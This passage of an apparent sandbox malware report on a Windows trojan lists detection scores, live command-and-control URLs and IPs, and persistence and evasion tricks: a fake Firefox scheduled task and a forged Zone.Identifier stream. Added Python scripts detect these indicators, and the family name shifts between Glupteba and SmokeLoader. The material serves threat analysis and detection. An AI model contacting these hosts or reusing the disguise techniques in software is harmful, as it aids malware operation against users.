    - Dropped: C:\Users\user\AppData\Roaming\ifvwgru, PE32; C:\Users\user\...\ifvwgru:Zone.Identifier, ASCII
    - Signatures: System process connects to network (likely due to code injection or exploit); Benign windows process drops PE files; Deletes itself after installation; Hides that the sample has been downloaded from the Internet (zone.identifier)

    Antivirus, machine learning and genetic malware detection

    Initial sample
    Source | Detection | Scanner | Label
    vwaoMjcyAw.exe | 74% | ReversingLabs | Win32.Trojan.Glupteba
    vwaoMjcyAw.exe | 77% | Virustotal |
    vwaoMjcyAw.exe | 100% | Joe Sandbox ML |

    Dropped files
    Source | Detection | Scanner | Label
    C:\Users\user\AppData\Roaming\ifvwgru | 100% | Joe Sandbox ML |
    C:\Users\user\AppData\Roaming\ifvwgru | 74% | ReversingLabs | Win32.Trojan.Glupteba
    C:\Users\user\AppData\Roaming\ifvwgru | 77% | Virustotal |

    Unpacked PE files
    No Antivirus matches

    Domains
    Source | Detection | Scanner | Label
    selebration17io.io | 17% | Virustotal |
    56.126.166.20.in-addr.arpa | 1% | Virustotal |
    URLs
    Source | Detection | Scanner | Label
    https://api.msn.com/v1/news/Feed/Windows? | 0% | URL Reputation | safe
    https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV | 0% | URL Reputation | safe
    https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings | 0% | URL Reputation | safe
    https://api.msn.com:443/v1/news/Feed/Windows? | 0% | URL Reputation | safe
    https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehwh2.svg | 0% | URL Reputation | safe
    https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew | 0% | URL Reputation | safe
    http://schemas.micro | 0% | URL Reputation | safe
    http://valarioulinity1.net/index.php | 100% | Avira URL Cloud | malware
    https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew | 0% | URL Reputation | safe
    https://api.msn.com/I | 0% | Avira URL Cloud | safe
    https://android.notify.windows.com/iOS | 0% | URL Reputation | safe
    https://www.msn.com/en-us/money/savingandinvesting/americans-average-net-worth-by-age/ar-AA1h4ngF | 0% | Avira URL Cloud | safe
    https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp | 0% | URL Reputation | safe
    https://api.msn.com/ | 0% | URL Reputation | safe
    https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark | 0% | URL Reputation | safe
    https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMhz | 0% | Avira URL Cloud | safe
    http://aeuothcasbr.com/ | 0% | Avira URL Cloud | safe
    https://excel.office.com- | 0% | Avira URL Cloud | safe
    https://word.office.comM | 0% | Avira URL Cloud | safe
    http://selebration17io.io/ | 100% | Avira URL Cloud | phishing
    http://vacantion18ffeu.cc/index.php | 100% | Avira URL Cloud | malware
    https://api.msn.com/v1/news/Feed/Windows?activityId=435B7A89D7D74BDF801F2DA188906BAF&timeOut=5000&oc | 0% | Avira URL Cloud | safe
    http://atahmsiplorwquuw.net/ | 0% | Avira URL Cloud | safe
    https://www.msn.com/en-us/money/realestate/why-this-florida-city-is-a-safe-haven-from-hurricanes/ar- | 0% | Avira URL Cloud | safe
    http://vacantion18ffeu.cc/index.php | 21% | Virustotal |
    https://api.msn.com/I | 0% | Virustotal |
    https://www.msn.com/en-us/travel/news/you-can-t-beat-bobby-flay-s-phoenix-airport-restaurant-one-of- | 0% | Avira URL Cloud | safe
    https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMhz-dark | 0% | Avira URL Cloud | safe
    http://selebration17io.io/ | 17% | Virustotal |
    https://www.msn.com/en-us/news/politics/how-donald-trump-helped-kari-lake-become-arizona-s-and-ameri | 0% | Avira URL Cloud | safe
    http://valarioulinity1.net/index.php | 15% | Virustotal |
    https://www.msn.com/en-us/money/personalfinance/money-matters-changing-institution-of-marriage/ar-AA | 0% | Avira URL Cloud | safe
    https://www.msn.com/en-us/news/us/biden-administration-waives-26-federal-laws-to-allow-border-wall-c | 0% | Avira URL Cloud | safe
    https://www.msn.com/en-us/weather/topstories/california-s-reservoirs-runneth-over-in-astounding-reve | 0% | Avira URL Cloud | safe
    http://goodfooggooftool.net/index.php | 100% | Avira URL Cloud | malware
    https://powerpoint.office.comEMd | 0% | Avira URL Cloud | safe
    http://aeuothcasbr.com/application/x-www-form-urlencodedMozilla/5.0 | 0% | Avira URL Cloud | safe
    http://cassiosssionunu.me/index.php | 100% | Avira URL Cloud | malware
    https://outlook.come | 0% | Avira URL Cloud | safe
    https://www.msn.com/en-us/news/technology/a-federal-emergency-alert-will-be-sent-to-us-phones-nation | 0% | Avira URL Cloud | safe
    https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-the | 0% | Avira URL Cloud | safe
    http://selebration17io.io/index.php | 100% | Avira URL Cloud | malware
    https://www.msn.com/en-us/news/politics/republicans-already-barred-trump-from-being-speaker-of-the-h | 0% | Avira URL Cloud | safe
    http://selebration17io.io/index.php | 15% | Virustotal |
    https://www.msn.com/en-us/news/politics/trump-campaign-says-he-raised-more-than-45-million-in-3rd-qu | 0% | Avira URL Cloud | safe
    https://wns.windows.com/e | 0% | Avira URL Cloud | safe
    https://www.msn.com/en-us/news/politics/kevin-mccarthy-s-ouster-as-house-speaker-could-cost-gop-its- | 0% | Avira URL Cloud | safe
    https://www.msn.com:443/en-us/feed | 0% | Avira URL Cloud | safe
    http://sulugilioiu19.net/index.php | 100% | Avira URL Cloud | malware
    https://www.msn.com:443/en-us/feed | 1% | Virustotal |
    https://www.msn.com/en-us/news/world/us-supplies-ukraine-with-a-million-rounds-of-ammunition-seized- | 0% | Avira URL Cloud | safe
    https://www.msn.com/en-us/money/personalfinance/10-things-rich-people-never-buy-and-you-shouldn-t-ei | 0% | Avira URL Cloud | safe
    http://goodfooggooftool.net/index.php | 16% | Virustotal |
    http://buriatiarutuhuob.net/index.php | 100% | Avira URL Cloud | malware
    http://buriatiarutuhuob.net/index.php | 16% | Virustotal |
    http://sulugilioiu19.net/index.php | 14% | Virustotal |
    http://cassiosssionunu.me/index.php | 14% | Virustotal |
    Contacted domains
    Name | IP | Active | Malicious | Antivirus Detection | Reputation
    selebration17io.io | 188.40.141.211 | true | true | | unknown
    56.126.166.20.in-addr.arpa | unknown | unknown | true | | unknown
    URLs from the malware configuration
    Name | Malicious | Antivirus Detection | Reputation
    http://valarioulinity1.net/index.php | true | Virustotal 15%; Avira URL Cloud: malware | unknown
    http://vacantion18ffeu.cc/index.php | true | Virustotal 21%; Avira URL Cloud: malware | unknown
    http://goodfooggooftool.net/index.php | true | Virustotal 16%; Avira URL Cloud: malware | unknown
    http://cassiosssionunu.me/index.php | true | Virustotal 14%; Avira URL Cloud: malware | unknown
    http://selebration17io.io/index.php | true | Virustotal 15%; Avira URL Cloud: malware | unknown
    http://sulugilioiu19.net/index.php | true | Virustotal 14%; Avira URL Cloud: malware | unknown
    http://buriatiarutuhuob.net/index.php | true | Virustotal 16%; Avira URL Cloud: malware | unknown
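The seven configuration URLs above are the actionable network indicators in this report, and the context tables further down show that selebration17io.io has resolved to 91.215.85.120 as well as 188.40.141.211, so matching on the host name catches more than matching on the current IP. The following is an added example, not Joe Sandbox or SmokeLoader code: it indexes the C2 URLs, scans a constructed tab-separated HTTP log, and adds a shape heuristic derived from what the report shows (every C2 is plain-HTTP /index.php, and the explorer.exe memory strings contain application/x-www-form-urlencoded next to a C2 host). The log format, the log lines and the IP list are constructed for the example; the heuristic will fire on ordinary PHP sites and is for hunting, not blocking.

```python
"""Match HTTP records against this sample's C2 configuration.
Added example, not Joe Sandbox or SmokeLoader code. The C2 URLs are the
ones in the report's malware configuration; C2_IPS comes from the report's
context tables; the log format and lines are constructed for the example."""
from typing import Dict, List, Set, Tuple
from urllib.parse import urlsplit

C2_URLS = [
    "http://valarioulinity1.net/index.php",
    "http://vacantion18ffeu.cc/index.php",
    "http://goodfooggooftool.net/index.php",
    "http://cassiosssionunu.me/index.php",
    "http://selebration17io.io/index.php",
    "http://sulugilioiu19.net/index.php",
    "http://buriatiarutuhuob.net/index.php",
]
# Current and previous resolution of selebration17io.io per the report.
C2_IPS = {"188.40.141.211", "91.215.85.120"}

# Tab-separated fields of the constructed log, one request per line.
FIELDS = ("ts", "src", "dst", "method", "host", "uri", "content_type")


def c2_index(urls: List[str]) -> Dict[str, Set[str]]:
    """host -> set of C2 paths, so a path change on a known host still hits on the host."""
    index: Dict[str, Set[str]] = {}
    for url in urls:
        parts = urlsplit(url)
        index.setdefault(parts.hostname.lower(), set()).add(parts.path or "/")
    return index


def parse_http_log(text: str) -> List[Dict[str, str]]:
    """Parse the constructed TSV log; malformed lines are skipped, not fatal."""
    rows = []
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        fields = line.split("\t")
        if len(fields) != len(FIELDS):
            continue
        rows.append(dict(zip(FIELDS, fields)))
    return rows


def classify(row: Dict[str, str], index: Dict[str, Set[str]], c2_ips: Set[str]) -> str:
    """Verdict for one request: config host (and path), known IP, shape heuristic, or benign."""
    host = row["host"].lower().rstrip(".")
    path = row["uri"].split("?", 1)[0] or "/"
    if host in index:
        return "c2-config-host" + ("-and-path" if path in index[host] else "")
    if row["dst"] in c2_ips:
        return "c2-known-ip"
    # Shape heuristic: plain-HTTP POST of a form-encoded body to /index.php,
    # the pattern all seven configured C2 URLs share. Expect false positives.
    if (row["method"] == "POST" and path.endswith("/index.php")
            and row["content_type"].startswith("application/x-www-form-urlencoded")):
        return "c2-shape-heuristic"
    return "benign"


def scan(text: str, urls: List[str] = C2_URLS, ips: Set[str] = C2_IPS) -> List[Tuple[str, str, str]]:
    """Return (host, uri, verdict) for every non-benign request in the log."""
    index = c2_index(urls)
    hits = []
    for row in parse_http_log(text):
        verdict = classify(row, index, ips)
        if verdict != "benign":
            hits.append((row["host"], row["uri"], verdict))
    return hits


# Constructed log: a beacon to the configured C2, a benign MSN request from
# the injected explorer.exe, a beacon to the older C2 IP by address, a
# heuristic-only hit, and a benign JSON POST. Addresses are documentation ranges.
SAMPLE_LOG = "\n".join([
    "#ts\tsrc\tdst\tmethod\thost\turi\tcontent_type",
    "1724224351\t10.0.0.5\t188.40.141.211\tPOST\tselebration17io.io\t/index.php\tapplication/x-www-form-urlencoded",
    "1724224352\t10.0.0.5\t192.0.2.10\tGET\tapi.msn.com\t/v1/news/Feed/Windows?ocid=x\t-",
    "1724224353\t10.0.0.5\t91.215.85.120\tPOST\t91.215.85.120\t/index.php\tapplication/x-www-form-urlencoded",
    "1724224354\t10.0.0.5\t203.0.113.9\tPOST\tcdn.example\t/app/index.php\tapplication/x-www-form-urlencoded",
    "1724224355\t10.0.0.5\t203.0.113.10\tPOST\tshop.example\t/api/cart\tapplication/json",
])

if __name__ == "__main__":
    for host, uri, verdict in scan(SAMPLE_LOG):
        print(f"{verdict:24} {host}{uri}")
```

Running it prints three hits (the configured host, the older IP and the heuristic match) and drops the MSN and JSON requests; feeding real proxy or Zeek http.log data only requires mapping its columns onto FIELDS.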
    URLs recovered from explorer.exe memory dumps. The injected host process carries its own MSN and Windows telemetry strings, so most entries are benign; the Malicious column separates them from the loader's C2 strings.
    Name | Malicious | Antivirus Detection | Reputation (Source dumps listed beneath each entry)

    https://api.msn.com/v1/news/Feed/Windows? | false | URL Reputation: safe | unknown
        Source: explorer.exe, 00000002.00000000.2254640839.000000000962B000.00000004.00000001.00020000.00000000.sdmp; explorer.exe, 00000002.00000002.3447903568.000000000962B000.00000004.00000001.00020000.00000000.sdmp
    https://api.msn.com/I | false | Virustotal 0%; Avira URL Cloud: safe | unknown
        Source: explorer.exe, 00000002.00000000.2254640839.000000000962B000.00000004.00000001.00020000.00000000.sdmp; explorer.exe, 00000002.00000002.3447903568.000000000962B000.00000004.00000001.00020000.00000000.sdmp
    https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV | false | URL Reputation: safe | unknown
        Source: explorer.exe, 00000002.00000002.3445199941.00000000073E5000.00000004.00000001.00020000.00000000.sdmp
    https://www.msn.com/en-us/money/savingandinvesting/americans-average-net-worth-by-age/ar-AA1h4ngF | false | Avira URL Cloud: safe | unknown
        Source: explorer.exe, 00000002.00000000.2252804961.00000000073E5000.00000004.00000001.00020000.00000000.sdmp; explorer.exe, 00000002.00000002.3445199941.00000000073E5000.00000004.00000001.00020000.00000000.sdmp
    https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings | false | URL Reputation: safe | unknown
        Source: explorer.exe, 00000002.00000002.3445199941.00000000073E5000.00000004.00000001.00020000.00000000.sdmp
    http://aeuothcasbr.com/ | false | Avira URL Cloud: safe | unknown
        Source: explorer.exe, 00000002.00000002.3452125149.000000000C385000.00000004.00000001.00020000.00000000.sdmp; explorer.exe, 00000002.00000003.2979437025.000000000C385000.00000004.00000001.00020000.00000000.sdmp
    https://api.msn.com:443/v1/news/Feed/Windows? | false | URL Reputation: safe | unknown
        Source: explorer.exe, 00000002.00000000.2252804961.00000000073E5000.00000004.00000001.00020000.00000000.sdmp; explorer.exe, 00000002.00000002.3447903568.000000000973C000.00000004.00000001.00020000.00000000.sdmp; explorer.exe, 00000002.00000000.2254640839.000000000973C000.00000004.00000001.00020000.00000000.sdmp; explorer.exe, 00000002.00000002.3445199941.00000000073E5000.00000004.00000001.00020000.00000000.sdmp
    https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMhz | false | Avira URL Cloud: safe | unknown
        Source: explorer.exe, 00000002.00000000.2252804961.00000000073E5000.00000004.00000001.00020000.00000000.sdmp; explorer.exe, 00000002.00000002.3445199941.00000000073E5000.00000004.00000001.00020000.00000000.sdmp
    https://excel.office.com- | false | Avira URL Cloud: safe | unknown
        Source: explorer.exe, 00000002.00000003.2979925369.000000000C08A000.00000004.00000001.00020000.00000000.sdmp; explorer.exe, 00000002.00000002.3451553162.000000000C08B000.00000004.00000001.00020000.00000000.sdmp; explorer.exe, 00000002.00000000.2256911237.000000000C048000.00000004.00000001.00020000.00000000.sdmp
    https://word.office.comM | false | Avira URL Cloud: safe | unknown
        Source: explorer.exe, 00000002.00000003.2979925369.000000000C08A000.00000004.00000001.00020000.00000000.sdmp; explorer.exe, 00000002.00000002.3451553162.000000000C08B000.00000004.00000001.00020000.00000000.sdmp; explorer.exe, 00000002.00000000.2256911237.000000000C048000.00000004.00000001.00020000.00000000.sdmp
    http://selebration17io.io/ | true | Virustotal 17%; Avira URL Cloud: phishing | unknown
        Source: explorer.exe, 00000002.00000002.3452125149.000000000C385000.00000004.00000001.00020000.00000000.sdmp; explorer.exe, 00000002.00000003.2979437025.000000000C385000.00000004.00000001.00020000.00000000.sdmp
    https://api.msn.com/v1/news/Feed/Windows?activityId=435B7A89D7D74BDF801F2DA188906BAF&timeOut=5000&oc | false | Avira URL Cloud: safe | unknown
        Source: explorer.exe, 00000002.00000000.2252804961.00000000073E5000.00000004.00000001.00020000.00000000.sdmp; explorer.exe, 00000002.00000002.3445199941.00000000073E5000.00000004.00000001.00020000.00000000.sdmp
    https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehwh2.svg | false | URL Reputation: safe | unknown
        Source: explorer.exe, 00000002.00000002.3445199941.00000000073E5000.00000004.00000001.00020000.00000000.sdmp
    https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew | false | URL Reputation: safe | unknown
        Source: explorer.exe, 00000002.00000000.2252804961.00000000073E5000.00000004.00000001.00020000.00000000.sdmp; explorer.exe, 00000002.00000002.3445199941.00000000073E5000.00000004.00000001.00020000.00000000.sdmp
    http://atahmsiplorwquuw.net/ | false | Avira URL Cloud: safe | unknown
        Source: explorer.exe, 00000002.00000002.3448807647.00000000099AB000.00000004.00000001.00020000.00000000.sdmp
    https://www.msn.com/en-us/money/realestate/why-this-florida-city-is-a-safe-haven-from-hurricanes/ar- | false | Avira URL Cloud: safe | unknown
        Source: explorer.exe, 00000002.00000000.2252804961.00000000073E5000.00000004.00000001.00020000.00000000.sdmp; explorer.exe, 00000002.00000002.3445199941.00000000073E5000.00000004.00000001.00020000.00000000.sdmp
    https://www.msn.com/en-us/travel/news/you-can-t-beat-bobby-flay-s-phoenix-airport-restaurant-one-of- | false | Avira URL Cloud: safe | unknown
        Source: explorer.exe, 00000002.00000000.2252804961.00000000073E5000.00000004.00000001.00020000.00000000.sdmp; explorer.exe, 00000002.00000002.3445199941.00000000073E5000.00000004.00000001.00020000.00000000.sdmp
    http://schemas.micro | false | URL Reputation: safe | unknown
        Source: explorer.exe, 00000002.00000000.2251732709.00000000028A0000.00000002.00000001.00040000.00000000.sdmp; explorer.exe, 00000002.00000002.3446354300.0000000007B60000.00000002.00000001.00040000.00000000.sdmp; explorer.exe, 00000002.00000002.3446333236.0000000007B50000.00000002.00000001.00040000.00000000.sdmp
    https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMhz-dark | false | Avira URL Cloud: safe | unknown
        Source: explorer.exe, 00000002.00000000.2252804961.00000000073E5000.00000004.00000001.00020000.00000000.sdmp; explorer.exe, 00000002.00000002.3445199941.00000000073E5000.00000004.00000001.00020000.00000000.sdmp
    https://www.msn.com/en-us/news/politics/how-donald-trump-helped-kari-lake-become-arizona-s-and-ameri | false | Avira URL Cloud: safe | unknown
        Source: explorer.exe, 00000002.00000000.2252804961.00000000073E5000.00000004.00000001.00020000.00000000.sdmp; explorer.exe, 00000002.00000002.3445199941.00000000073E5000.00000004.00000001.00020000.00000000.sdmp
    https://www.msn.com/en-us/money/personalfinance/money-matters-changing-institution-of-marriage/ar-AA | false | Avira URL Cloud: safe | unknown
        Source: explorer.exe, 00000002.00000000.2252804961.00000000073E5000.00000004.00000001.00020000.00000000.sdmp; explorer.exe, 00000002.00000002.3445199941.00000000073E5000.00000004.00000001.00020000.00000000.sdmp
    https://www.msn.com/en-us/news/us/biden-administration-waives-26-federal-laws-to-allow-border-wall-c | false | Avira URL Cloud: safe | unknown
        Source: explorer.exe, 00000002.00000000.2252804961.00000000073E5000.00000004.00000001.00020000.00000000.sdmp; explorer.exe, 00000002.00000002.3445199941.00000000073E5000.00000004.00000001.00020000.00000000.sdmp
    https://www.msn.com/en-us/weather/topstories/california-s-reservoirs-runneth-over-in-astounding-reve | false | Avira URL Cloud: safe | unknown
        Source: explorer.exe, 00000002.00000000.2252804961.00000000073E5000.00000004.00000001.00020000.00000000.sdmp; explorer.exe, 00000002.00000002.3445199941.00000000073E5000.00000004.00000001.00020000.00000000.sdmp
    https://powerpoint.office.comEMd | false | Avira URL Cloud: safe | unknown
        Source: explorer.exe, 00000002.00000000.2256911237.000000000BFEF000.00000004.00000001.00020000.00000000.sdmp; explorer.exe, 00000002.00000002.3451360110.000000000BFEF000.00000004.00000001.00020000.00000000.sdmp
    https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew | false | URL Reputation: safe | unknown
        Source: explorer.exe, 00000002.00000000.2252804961.00000000073E5000.00000004.00000001.00020000.00000000.sdmp; explorer.exe, 00000002.00000002.3445199941.00000000073E5000.00000004.00000001.00020000.00000000.sdmp
    http://aeuothcasbr.com/application/x-www-form-urlencodedMozilla/5.0 | false | Avira URL Cloud: safe | unknown
        Source: explorer.exe, 00000002.00000002.3452125149.000000000C385000.00000004.00000001.00020000.00000000.sdmp; explorer.exe, 00000002.00000003.2979437025.000000000C385000.00000004.00000001.00020000.00000000.sdmp
    https://android.notify.windows.com/iOS | false | URL Reputation: safe | unknown
        Source: explorer.exe, 00000002.00000002.3451360110.000000000BFDF000.00000004.00000001.00020000.00000000.sdmp; explorer.exe, 00000002.00000000.2256911237.000000000BFDF000.00000004.00000001.00020000.00000000.sdmp
    https://outlook.come | false | Avira URL Cloud: safe | unknown
        Source: explorer.exe, 00000002.00000003.2979925369.000000000C08A000.00000004.00000001.00020000.00000000.sdmp; explorer.exe, 00000002.00000002.3451553162.000000000C08B000.00000004.00000001.00020000.00000000.sdmp; explorer.exe, 00000002.00000000.2256911237.000000000C048000.00000004.00000001.00020000.00000000.sdmp
    https://www.msn.com/en-us/news/technology/a-federal-emergency-alert-will-be-sent-to-us-phones-nation | false | Avira URL Cloud: safe | unknown
        Source: explorer.exe, 00000002.00000000.2252804961.00000000073E5000.00000004.00000001.00020000.00000000.sdmp; explorer.exe, 00000002.00000002.3445199941.00000000073E5000.00000004.00000001.00020000.00000000.sdmp
    https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp | false | URL Reputation: safe | unknown
        Source: explorer.exe, 00000002.00000000.2255032281.00000000099AB000.00000004.00000001.00020000.00000000.sdmp
    https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-the | false | Avira URL Cloud: safe | unknown
        Source: explorer.exe, 00000002.00000000.2252804961.00000000073E5000.00000004.00000001.00020000.00000000.sdmp; explorer.exe, 00000002.00000002.3445199941.00000000073E5000.00000004.00000001.00020000.00000000.sdmp
    https://api.msn.com/ | false | URL Reputation: safe | unknown
        Source: explorer.exe, 00000002.00000000.2254640839.000000000962B000.00000004.00000001.00020000.00000000.sdmp; explorer.exe, 00000002.00000002.3447903568.000000000962B000.00000004.00000001.00020000.00000000.sdmp
    https://www.msn.com/en-us/news/politics/republicans-already-barred-trump-from-being-speaker-of-the-h | false | Avira URL Cloud: safe | unknown
        Source: explorer.exe, 00000002.00000000.2252804961.00000000073E5000.00000004.00000001.00020000.00000000.sdmp; explorer.exe, 00000002.00000002.3445199941.00000000073E5000.00000004.00000001.00020000.00000000.sdmp
    https://www.msn.com/en-us/news/politics/trump-campaign-says-he-raised-more-than-45-million-in-3rd-qu | false | Avira URL Cloud: safe | unknown
        Source: explorer.exe, 00000002.00000000.2252804961.00000000073E5000.00000004.00000001.00020000.00000000.sdmp; explorer.exe, 00000002.00000002.3445199941.00000000073E5000.00000004.00000001.00020000.00000000.sdmp
    https://wns.windows.com/e | false | Avira URL Cloud: safe | unknown
        Source: explorer.exe, 00000002.00000002.3448807647.00000000099AB000.00000004.00000001.00020000.00000000.sdmp; explorer.exe, 00000002.00000000.2255032281.00000000099AB000.00000004.00000001.00020000.00000000.sdmp
    https://www.msn.com/en-us/news/politics/kevin-mccarthy-s-ouster-as-house-speaker-could-cost-gop-its- | false | Avira URL Cloud: safe | unknown
        Source: explorer.exe, 00000002.00000000.2252804961.00000000073E5000.00000004.00000001.00020000.00000000.sdmp; explorer.exe, 00000002.00000002.3445199941.00000000073E5000.00000004.00000001.00020000.00000000.sdmp
    https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark | false | URL Reputation: safe | unknown
        Source: explorer.exe, 00000002.00000002.3445199941.00000000073E5000.00000004.00000001.00020000.00000000.sdmp
    https://www.msn.com:443/en-us/feed | false | Virustotal 1%; Avira URL Cloud: safe | unknown
        Source: explorer.exe, 00000002.00000000.2252804961.00000000073E5000.00000004.00000001.00020000.00000000.sdmp; explorer.exe, 00000002.00000002.3445199941.00000000073E5000.00000004.00000001.00020000.00000000.sdmp
    https://www.msn.com/en-us/news/world/us-supplies-ukraine-with-a-million-rounds-of-ammunition-seized- | false | Avira URL Cloud: safe | unknown
        Source: explorer.exe, 00000002.00000000.2252804961.00000000073E5000.00000004.00000001.00020000.00000000.sdmp; explorer.exe, 00000002.00000002.3445199941.00000000073E5000.00000004.00000001.00020000.00000000.sdmp
    https://www.msn.com/en-us/money/personalfinance/10-things-rich-people-never-buy-and-you-shouldn-t-ei | false | Avira URL Cloud: safe | unknown
        Source: explorer.exe, 00000002.00000000.2252804961.00000000073E5000.00000004.00000001.00020000.00000000.sdmp; explorer.exe, 00000002.00000002.3445199941.00000000073E5000.00000004.00000001.00020000.00000000.sdmp
    Contacted IPs
    IP | Domain | Country | ASN | ASN Name | Malicious
    188.40.141.211 | selebration17io.io | Germany | 24940 | HETZNER-ASDE | true
    Joe Sandbox version:40.0.0 Tourmaline
    Analysis ID:1496331
    Start date and time:2024-08-21 07:11:10 +02:00
    Joe Sandbox product:CloudBasic
    Overall analysis duration:0h 5m 3s
    Hypervisor based Inspection enabled:false
    Report type:full
    Cookbook file name:default.jbs
    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
    Number of analysed new started processes analysed:7
    Number of new started drivers analysed:0
    Number of existing processes analysed:0
    Number of existing drivers analysed:0
    Number of injected processes analysed:1
    Technologies:
    • HCA enabled
    • EGA enabled
    • AMSI enabled
    Analysis Mode:default
    Analysis stop reason:Timeout
    Sample name:vwaoMjcyAw.exe
    renamed because original name is a hash value
    Original Sample Name:49b527dacc10e6d0e9d2924ecc4e59a8d727d5a2eb89aea324d303f4c8e7ba28.exe
    Detection:MAL
    Classification:mal100.troj.evad.winEXE@2/2@2/1
    EGA Information:
    • Successful, ratio: 100%
    HCA Information:
    • Successful, ratio: 100%
    • Number of executed functions: 64
    • Number of non-executed functions: 7
    Cookbook Comments:
    • Found application associated with file extension: .exe
    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
    • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
    • Report size getting too big, too many NtEnumerateKey calls found.
    • Report size getting too big, too many NtOpenKeyEx calls found.
    • Report size getting too big, too many NtQueryValueKey calls found.
    Time | Type | Description
    01:12:25 | API Interceptor | 616x Sleep call for process: explorer.exe modified
    07:12:31 | Task Scheduler | Run new task: Firefox Default Browser Agent E9356D34AD307885, path: C:\Users\user\AppData\Roaming\ifvwgru
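The Task Scheduler entry above is the persistence mechanism: a task named after Mozilla's real "Firefox Default Browser Agent" task, but whose action is an extension-less PE in the user's Roaming profile. Together with the Zone.Identifier stream the report lists among the dropped files (26 bytes, content [ZoneTransfer] / ZoneId=0, which is what the "Hides that the sample has been downloaded from the Internet" signature refers to), these are the two host artefacts worth a detection. The following is an added example, not Joe Sandbox or SmokeLoader code: it parses the Zone.Identifier stream and scores a scheduled-task registration, using constructed inputs that reproduce the report's values. The vendor word list, the trusted-directory list and the benign comparison task are assumptions made for the example.

```python
"""Checks for the two host artefacts this report records for the dropped
payload: the scheduled task "Firefox Default Browser Agent E9356D34AD307885"
whose action is C:\\Users\\user\\AppData\\Roaming\\ifvwgru, and the 26-byte
ifvwgru:Zone.Identifier stream ([ZoneTransfer] / ZoneId=0). Added example,
not Joe Sandbox or SmokeLoader code; the word lists and the benign
comparison task are assumptions made for the example."""
from dataclasses import dataclass
from typing import Dict, List

# URLZONE_* values as they appear in Zone.Identifier streams.
ZONE_NAMES = {0: "LocalMachine", 1: "LocalIntranet", 2: "Trusted", 3: "Internet", 4: "Restricted"}

# Product names malware borrows for task names (assumption for this example).
VENDOR_WORDS = ("firefox", "mozilla", "google", "microsoft", "adobe", "onedrive")
TRUSTED_DIRS = ("c:\\program files\\", "c:\\program files (x86)\\", "c:\\windows\\")
USER_WRITABLE = ("\\appdata\\roaming\\", "\\appdata\\local\\", "\\users\\public\\")
EXECUTABLE_EXT = {".exe", ".dll", ".bat", ".cmd", ".ps1", ".vbs", ".js", ".scr"}


def parse_zone_identifier(stream: bytes) -> Dict[str, str]:
    """Parse the INI-style body of a :Zone.Identifier alternate data stream.
    The report's stream, b"[ZoneTransfer]\\r\\nZoneId=0\\r\\n", is 26 bytes,
    matching the size the report lists for the dropped stream."""
    values: Dict[str, str] = {}
    section = None
    for raw in stream.decode("utf-8", errors="replace").splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1]
        elif section == "ZoneTransfer" and "=" in line:
            key, value = line.split("=", 1)
            values[key.strip()] = value.strip()
    return values


def zone_identifier_findings(stream: bytes) -> List[str]:
    """Why a Zone.Identifier stream on a freshly dropped PE is suspicious."""
    zone_info = parse_zone_identifier(stream)
    if "ZoneId" not in zone_info:
        return ["Zone.Identifier present without a ZoneId value"]
    try:
        zone = int(zone_info["ZoneId"])
    except ValueError:
        return [f"unparseable ZoneId {zone_info['ZoneId']!r}"]
    findings = []
    # Browsers and mail clients stamp downloads with 3 (Internet) or 4
    # (Restricted). A stream that explicitly says 0/1/2 was written by the
    # dropper so that SmartScreen and the Mark-of-the-Web prompt never fire.
    if zone < 3:
        findings.append(f"ZoneId={zone} ({ZONE_NAMES.get(zone, 'unknown')}) written explicitly: MOTW suppressed")
    # Heuristic: browser-written streams normally carry HostUrl/ReferrerUrl.
    if "HostUrl" not in zone_info and "ReferrerUrl" not in zone_info:
        findings.append("no HostUrl/ReferrerUrl: stream was not written by a browser download")
    return findings


@dataclass
class ScheduledTask:
    name: str
    action: str  # path the task runs, as logged at registration


def task_findings(task: ScheduledTask) -> List[str]:
    """Flag a task that borrows a vendor product name while its action lives
    in a user-writable directory, as the report's Firefox-styled task does."""
    findings = []
    path = task.action.strip('"').lower()
    basename = path.rsplit("\\", 1)[-1]
    ext = basename[basename.rfind("."):] if "." in basename else ""
    if any(d in path for d in USER_WRITABLE):
        findings.append("action path is inside a user-writable profile directory")
    if ext not in EXECUTABLE_EXT:
        findings.append(f"action file has no executable extension ({ext or 'none'})")
    if any(w in task.name.lower() for w in VENDOR_WORDS) and not path.startswith(TRUSTED_DIRS):
        findings.append("vendor-styled task name but action outside Program Files / Windows")
    return findings


def triage(task: ScheduledTask, zone_stream: bytes) -> List[str]:
    """Combine both checks for the dropped file a task points at."""
    return task_findings(task) + zone_identifier_findings(zone_stream)


# Constructed inputs reproducing the report's two artefacts.
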